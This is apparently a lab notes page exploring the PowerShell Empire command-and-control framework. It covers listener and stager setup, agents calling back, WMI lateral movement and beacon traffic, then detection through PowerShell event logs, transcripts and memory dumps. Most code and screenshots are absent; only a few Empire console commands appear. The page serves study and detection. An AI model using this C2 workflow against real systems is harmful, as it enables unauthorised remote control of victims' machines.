Powershell Empire 101

Exploring key concepts of the Powershell Empire

Listener

attacker@local
// Empire commands used
?
uselistener meterpreter
info

Starting the listener:

Stager

Stager will download and execute the final payload which will call back to the listener we set up previously - meterpreter- below shows how to set it up:

A quick look at the stager code:

Issues

Various stagers I generated for the meterpreter listener were giving me errors like this and this:

and this:

After looking at the traffic and a quick nmap scan, it seemed like there may be a bug in Empire's uselistener module when used with meterpreter - for some reason it will not actually start listening/open up the port:

To test this assumption, I created another http listener on port 80 - which worked immediately, leaving the meterpeter listener being buggy at least in my environment:

Agent

Agent is essentially a compromised victim system that called back to the listener and is now ready to receive commands.

Continuing testing with the http listener and a multi/launcher stager, the agent is finally returned once the launcher.ps1 (read: stager) is executed on the victim system:

Let's try getting one more agent back from another machine via WMI lateral movement:

Beaconing

With default http listener profile set, below are the most commonly used URLs of the agent beaconing back to the listener:

The packet data in any of those beacons:

Observations

Note how executing the stager launcher.ps1 spawned another powershell instance and both parent and the child windows are hidden. Note that the children powershell was invoked with an encoded powershell command line:

Stager's command line in base64:

Decoded command line with notable user agent, C2 server and a session cookie:

Logs

If we isolate the evil powershell that was infected by the Empire in our SIEM, we can see the beacons:

A compromised system can generate event 800 showing the following in Windows PowerShell logs (powershell 5.0+):

Also loads of 4103 events in Microsoft-Windows-PowerShell/Operational:

In the same way, if PS transcript logging is enabled, the stager execution could be captured in there:

Memory Dumps

A memory dump can also reveal the same stager activity:

References

http://www.harmj0y.net/blog/empire/expanding-your-empire/www.harmj0y.net
http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/www.harmj0y.net
LogoHow to Use PowerShell Empire: Getting Started with Post-Exploitation of Windows HostsNull Byte
https://ethicalhackingblog.com/hacking-powershell-empire-2-0/ethicalhackingblog.com
LogoJustin Warner – MediumMedium

https://www.sans.org/reading-room/whitepapers/incident/disrupting-empire-identifying-powershell-empire-command-control-activity-38315

PreviousCobalt Strike 101NextSpiderfoot 101 with Kali using Docker

Last updated

Was this helpful?